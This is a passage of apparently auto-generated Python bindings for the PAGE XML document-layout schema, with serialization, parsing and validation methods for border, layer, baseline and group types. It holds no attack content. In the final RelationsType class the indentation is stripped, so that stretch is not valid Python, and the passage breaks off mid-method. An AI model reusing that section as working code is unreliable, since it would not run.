        written here is added to that set)."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
        if self.caption is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.continuation is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            # Booleans are serialized via gds_format_boolean ("true"/"false").
            outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupType', fromsubclass_=False, pretty_print=True):
        """Serialize child elements in schema order: UserDefined, Labels,
        RegionRef, OrderedGroup, UnorderedGroup."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
        for RegionRef_ in self.RegionRef:
            namespaceprefix_ = self.RegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRef_nsprefix_) else ''
            RegionRef_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRef', pretty_print=pretty_print)
        for OrderedGroup_ in self.OrderedGroup:
            namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
            OrderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
        for UnorderedGroup_ in self.UnorderedGroup:
            namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
            UnorderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from the ElementTree *node* (attributes
        first, then children); returns self for chaining."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace prefix from the child's tag to get its local name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes from *node*, validating the
        ``type`` attribute and parsing ``continuation`` as a boolean."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
        value = find_attr_value_('caption', node)
        if value is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            self.caption = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
        value = find_attr_value_('continuation', node)
        if value is not None and 'continuation' not in already_processed:
            already_processed.add('continuation')
            # xsd:boolean accepts "true"/"1" and "false"/"0"; anything else is a parse error.
            if value in ('true', '1'):
                self.continuation = True
            elif value in ('false', '0'):
                self.continuation = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Dispatch one child XML node to the matching generated type and
        attach the built object; unrecognised child tags are ignored."""
        if nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
        elif nodeName_ == 'RegionRef':
            obj_ = RegionRefType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.RegionRef.append(obj_)
            obj_.original_tagname_ = 'RegionRef'
        elif nodeName_ == 'OrderedGroup':
            obj_ = OrderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.OrderedGroup.append(obj_)
            obj_.original_tagname_ = 'OrderedGroup'
        elif nodeName_ == 'UnorderedGroup':
            obj_ = UnorderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UnorderedGroup.append(obj_)
            obj_.original_tagname_ = 'UnorderedGroup'
# end class UnorderedGroupType
class BorderType(GeneratedsSuper):
    """Border of the actual page (if the scanned image
    contains parts not belonging to the page).

    Holds a single ``Coords`` child element describing the border polygon.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, Coords=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.Coords = Coords
        self.Coords_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create a BorderType instance, honouring any registered subclass hook."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, BorderType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if BorderType.subclass:
            return BorderType.subclass(*args_, **kwargs_)
        else:
            return BorderType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Coords(self):
        return self.Coords
    def set_Coords(self, Coords):
        self.Coords = Coords
    def hasContent_(self):
        # True when there is a Coords child to serialize.
        if (
            self.Coords is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BorderType', pretty_print=True):
        """Serialize this element to *outfile* as XML at indent *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('BorderType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'BorderType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='BorderType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='BorderType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='BorderType'):
        # BorderType declares no XML attributes of its own.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BorderType', fromsubclass_=False, pretty_print=True):
        """Serialize the single optional Coords child."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.Coords is not None:
            namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
            self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes to read for BorderType.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        if nodeName_ == 'Coords':
            obj_ = CoordsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Coords = obj_
            obj_.original_tagname_ = 'Coords'
    def get_polygon(self):
        '''
        Get polygon from element which is parent of a Coords element

        Parses Coords.points ("x1,y1 x2,y2 ...") into a list of [x, y]
        integer pairs.
        '''
        points = [point for point in self.Coords.points.split(' ')]
        return [[int(coord) for coord in point.split(',')] for point in points]
    def get_polygon_string(self):
        '''
        Get polygon string from element which is parent of a Coords element
        '''
        # NOTE(review): this flattens "x1,y1 x2,y2" into "x1,y1,x2,y2"
        # (a single comma-separated list) — confirm callers expect that.
        return self.Coords.points.replace(' ', ',')
# end class BorderType
class LayersType(GeneratedsSuper):
    """Can be used to express the z-index of overlapping
    regions. An element with a greater z-index is always in
    front of another element with lower z-index.

    Container for one or more ``Layer`` child elements.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('Layer', 'LayerType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'Layer', 'type': 'LayerType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, Layer=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Default to a fresh list per instance (avoids shared mutable default).
        if Layer is None:
            self.Layer = []
        else:
            self.Layer = Layer
        self.Layer_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create a LayersType instance, honouring any registered subclass hook."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, LayersType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if LayersType.subclass:
            return LayersType.subclass(*args_, **kwargs_)
        else:
            return LayersType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Layer(self):
        return self.Layer
    def set_Layer(self, Layer):
        self.Layer = Layer
    def add_Layer(self, value):
        self.Layer.append(value)
    def insert_Layer_at(self, index, value):
        self.Layer.insert(index, value)
    def replace_Layer_at(self, index, value):
        self.Layer[index] = value
    def hasContent_(self):
        # True when at least one Layer child exists.
        if (
            self.Layer
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayersType', pretty_print=True):
        """Serialize this element to *outfile* as XML at indent *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('LayersType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'LayersType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LayersType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LayersType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LayersType'):
        # LayersType declares no XML attributes of its own.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayersType', fromsubclass_=False, pretty_print=True):
        """Serialize each Layer child in order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Layer_ in self.Layer:
            namespaceprefix_ = self.Layer_nsprefix_ + ':' if (UseCapturedNS_ and self.Layer_nsprefix_) else ''
            Layer_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Layer', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes to read for LayersType.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        if nodeName_ == 'Layer':
            obj_ = LayerType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Layer.append(obj_)
            obj_.original_tagname_ = 'Layer'
# end class LayersType
class LayerType(GeneratedsSuper):
    """A single z-ordered layer: a required ``id`` and integer ``zIndex``
    attribute, an optional ``caption``, and one or more RegionRef children
    naming the regions on this layer."""
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('zIndex', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('RegionRef', 'RegionRefType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'RegionRef', 'type': 'RegionRefType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, zIndex=None, caption=None, RegionRef=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        # zIndex is coerced to int on construction.
        self.zIndex = _cast(int, zIndex)
        self.zIndex_nsprefix_ = None
        self.caption = _cast(None, caption)
        self.caption_nsprefix_ = None
        if RegionRef is None:
            self.RegionRef = []
        else:
            self.RegionRef = RegionRef
        self.RegionRef_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create a LayerType instance, honouring any registered subclass hook."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, LayerType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if LayerType.subclass:
            return LayerType.subclass(*args_, **kwargs_)
        else:
            return LayerType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_RegionRef(self):
        return self.RegionRef
    def set_RegionRef(self, RegionRef):
        self.RegionRef = RegionRef
    def add_RegionRef(self, value):
        self.RegionRef.append(value)
    def insert_RegionRef_at(self, index, value):
        self.RegionRef.insert(index, value)
    def replace_RegionRef_at(self, index, value):
        self.RegionRef[index] = value
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_zIndex(self):
        return self.zIndex
    def set_zIndex(self, zIndex):
        self.zIndex = zIndex
    def get_caption(self):
        return self.caption
    def set_caption(self, caption):
        self.caption = caption
    def hasContent_(self):
        # True when at least one RegionRef child exists.
        if (
            self.RegionRef
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayerType', pretty_print=True):
        """Serialize this element to *outfile* as XML at indent *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('LayerType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'LayerType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LayerType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LayerType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LayerType'):
        """Write the id, zIndex and caption attributes (when set)."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.zIndex is not None and 'zIndex' not in already_processed:
            already_processed.add('zIndex')
            outfile.write(' zIndex="%s"' % self.gds_format_integer(self.zIndex, input_name='zIndex'))
        if self.caption is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayerType', fromsubclass_=False, pretty_print=True):
        """Serialize each RegionRef child in order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for RegionRef_ in self.RegionRef:
            namespaceprefix_ = self.RegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRef_nsprefix_) else ''
            RegionRef_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRef', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read id, zIndex (parsed as integer) and caption from *node*."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('zIndex', node)
        if value is not None and 'zIndex' not in already_processed:
            already_processed.add('zIndex')
            self.zIndex = self.gds_parse_integer(value, node, 'zIndex')
        value = find_attr_value_('caption', node)
        if value is not None and 'caption' not in already_processed:
            already_processed.add('caption')
            self.caption = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        if nodeName_ == 'RegionRef':
            obj_ = RegionRefType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.RegionRef.append(obj_)
            obj_.original_tagname_ = 'RegionRef'
# end class LayerType
class BaselineType(GeneratedsSuper):
    """Baseline element: a polyline given by the required ``points``
    attribute ("x1,y1 x2,y2 ..."), with an optional confidence value
    ``conf`` (a float between 0 and 1).  It has no child elements."""
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('points', 'pc:PointsType', 0, 0, {'use': 'required'}),
        MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, points=None, conf=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.points = _cast(None, points)
        self.points_nsprefix_ = None
        # conf is coerced to float on construction.
        self.conf = _cast(float, conf)
        self.conf_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create a BaselineType instance, honouring any registered subclass hook."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, BaselineType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if BaselineType.subclass:
            return BaselineType.subclass(*args_, **kwargs_)
        else:
            return BaselineType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_points(self):
        return self.points
    def set_points(self, points):
        self.points = points
    def get_conf(self):
        return self.conf
    def set_conf(self, conf):
        self.conf = conf
    def validate_PointsType(self, value):
        """Validate *value* against pc:PointsType (a pattern-restricted string).

        Returns True when the value is valid or validation is skipped,
        False otherwise; failures are also reported to self.gds_collector_.
        (Fixed: the original fell through and returned None on a pattern
        mismatch while returning False on a type mismatch.)
        """
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            if not self.gds_validate_simple_patterns(
                self.validate_PointsType_patterns_, value):
                self.gds_collector_.add_message('Value "%s" does not match xsd pattern restrictions: %s' % (encode_str_2_3(value), self.validate_PointsType_patterns_, ))
                return False
        return True
    validate_PointsType_patterns_ = [['^(([0-9]+,[0-9]+ )+([0-9]+,[0-9]+))$']]
    def validate_ConfSimpleType(self, value):
        """Validate *value* against pc:ConfSimpleType (a float in [0, 1]).

        Returns True when the value is valid or validation is skipped,
        False otherwise; failures are also reported to self.gds_collector_.
        (Fixed: ``result`` was assigned but never initialised or returned,
        so the original silently returned None in the non-type-error cases.)
        """
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, float):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
                result = False
            if value > 1:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        # BaselineType is attribute-only; it never has child content.
        # (The generated original tested an empty tuple, which is always falsy.)
        return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BaselineType', pretty_print=True):
        """Serialize this element to *outfile* as XML at indent *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('BaselineType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'BaselineType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='BaselineType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='BaselineType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='BaselineType'):
        """Write the points and conf attributes (when set)."""
        if self.points is not None and 'points' not in already_processed:
            already_processed.add('points')
            outfile.write(' points=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.points), input_name='points')), ))
        if self.conf is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BaselineType', fromsubclass_=False, pretty_print=True):
        # No child elements to serialize.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this object from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read points (pattern-validated) and conf (float, range-validated)."""
        value = find_attr_value_('points', node)
        if value is not None and 'points' not in already_processed:
            already_processed.add('points')
            self.points = value
            self.validate_PointsType(self.points) # validate type PointsType
        value = find_attr_value_('conf', node)
        if value is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            value = self.gds_parse_float(value, node, 'conf')
            self.conf = value
            self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements to parse.
        pass
# end class BaselineType
class RelationsType(GeneratedsSuper):
"""Container for one-to-one relations between layout
objects (for example: DropCap - paragraph, caption -
image)."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Relation', 'RelationType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'Relation', 'type': 'RelationType'}, None),
]
subclass = None
superclass = None
def __init__(self, Relation=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if Relation is None:
self.Relation = []
else:
self.Relation = Relation
self.Relation_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RelationsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RelationsType.subclass:
return RelationsType.subclass(*args_, **kwargs_)
else:
return RelationsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Relation(self):
return self.Relation
def set_Relation(self, Relation):
self.Relation = Relation
def add_Relation(self, value):
self.Relation.append(value)
def insert_Relation_at(self, index, value):
self.Relation.insert(index, value)
def replace_Relation_at(self, index, value):
self.Relation[index] = value
def hasContent_(self):
if (
self.Relation
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationsType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RelationsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RelationsType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RelationsType')
if self.hasContent_():
